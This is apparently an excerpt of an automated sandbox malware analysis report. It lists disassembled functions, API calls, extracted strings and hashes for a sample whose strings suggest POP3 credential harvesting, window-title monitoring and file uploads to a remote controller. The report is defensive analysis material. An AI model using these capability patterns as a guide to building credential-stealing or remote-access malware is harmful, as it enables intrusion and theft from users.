                                                                                                                                                                                                                                                                                                                              • String ID: WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$winhttp.dll
                                                                                                                                                                                                                                                                                                                              • API String ID: 2238633743-1483618772
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e8a3204d4a55cb4efda40a2bc34e722aa0141a8d0c6d521df876b84b5db0583d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88115430C1133896F760EBB5AC98F67BEECEB41684F60021BF504521A4D7B85587DF50
                                                                                                                                                                                                                                                                                                                              Function 0283173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02831CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D1B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02831CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 02831D37
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 02831CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D4B
                                                                                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 02831855
                                                                                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 02831869
                                                                                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 0283188B
                                                                                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 028318AE
                                                                                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 028318C8
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                                                                                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                                                                                                                                              • API String ID: 3296212668-3023110444
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 791fa7f1a91ea43b0193809248a271335468579a3c905e391e0964ccd815834f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F561F27DD00218AAEF179BA8CC48BEEB7BAAF05704F404056D94CE7250EB745A46CFD6
                                                                                                                                                                                                                                                                                                                              Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                                                                                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B217
                                                                                                                                                                                                                                                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                                                                                                                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                                                                                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                                                                                                                                                                                                                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0041B2EB
                                                                                                                                                                                                                                                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B323
                                                                                                                                                                                                                                                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B380
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                                                                                                              • API String ID: 3941738427-1684325040
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                                                                                                                                                                                                                                              Function 028319B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                                                                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                                                                                                                              • API String ID: 4218353326-230879103
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3d19542244dca3626de908a7c0b74b4fd2fc1ee6c150d0fe0c94cf8249192f0b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A07117BDD052285BDF13ABA89C88ADE7BFD9B05700F1440A6D948D3240E6749B89CFE1
                                                                                                                                                                                                                                                                                                                              Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3899193279-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                                                                                                                                                                                                                                              Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                                                                                                                                                              • String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
                                                                                                                                                                                                                                                                                                                              • API String ID: 911427763-1497357211
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1d8ac9411821d3a22de1829c236fe778cc0ea5511bdaceb9b19cf52e55b550d0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d8ac9411821d3a22de1829c236fe778cc0ea5511bdaceb9b19cf52e55b550d0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
                                                                                                                                                                                                                                                                                                                              Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                                                                                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0041CB08
                                                                                                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                                                                                                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                                                                                                                                                                                                                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041CB84
                                                                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0041CB8A
                                                                                                                                                                                                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                                                                                                                                                              • String ID: Close
                                                                                                                                                                                                                                                                                                                              • API String ID: 1657328048-3535843008
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                                                                                                                                                                                                                                              Function 00444F4D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                                                                                                                                                                                                                              Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                                                                                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1884690901-3066803209
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 22b4246dc4494664ff4f9d7f66fb562b6c9662ba480adf9c86f6551ceb46db34
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22b4246dc4494664ff4f9d7f66fb562b6c9662ba480adf9c86f6551ceb46db34
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                                                                                                                                                                                                                              Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                                                                                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                                                                                                                                                              • API String ID: 3795512280-3163867910
                                                                                                                                                                                                                                                                                                                              • Opcode ID: faec676d903500b48f115970a2956ec8bf063502ca33a6480f275e3b5f8bff98
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: faec676d903500b48f115970a2956ec8bf063502ca33a6480f275e3b5f8bff98
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                                                                                                                                                                                                                                              Function 00413E37 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
